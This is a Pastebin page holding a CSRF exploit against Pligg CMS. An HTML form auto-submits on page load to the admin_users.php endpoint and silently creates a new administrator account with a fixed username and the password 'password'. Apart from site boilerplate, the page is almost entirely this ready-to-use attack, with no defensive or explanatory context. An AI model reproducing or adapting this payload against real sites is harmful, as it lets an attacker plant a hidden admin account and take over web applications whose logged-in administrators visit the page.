Pligg CMS CSRF Add Admin Exploit

jackwilder Aug 25th, 2015 575 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <body onload="document.exploit.submit();">
  2. <form action="http://localhost/jmbut/admin/admin_users.php"
  3. method="post" id="createUserForm" name="exploit" onsubmit="return
  4. checkValidation()">
  5. <input name="username" type="text" class="form-control" id="username"
  6. value="yuyudhn"  onchange="checkUsername(this.value)" />
  7. <input name="email" type="text" class="form-control" id="email" value="
  8." onchange="checkEmail(this.value)"/>
  9. <select name="level">
  10. <option value="admin">Admin</option>
  11. </select>
  12. <input name="password" type="text" class="form-control" id="password"
  13. value="password" onchange="checkPassword(this.value)"/>
  14. <input type="hidden" name="mode" value="newuser">
  15. <input type="submit" class="btn btn-primary" value="Create User"/>
  17. </form>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand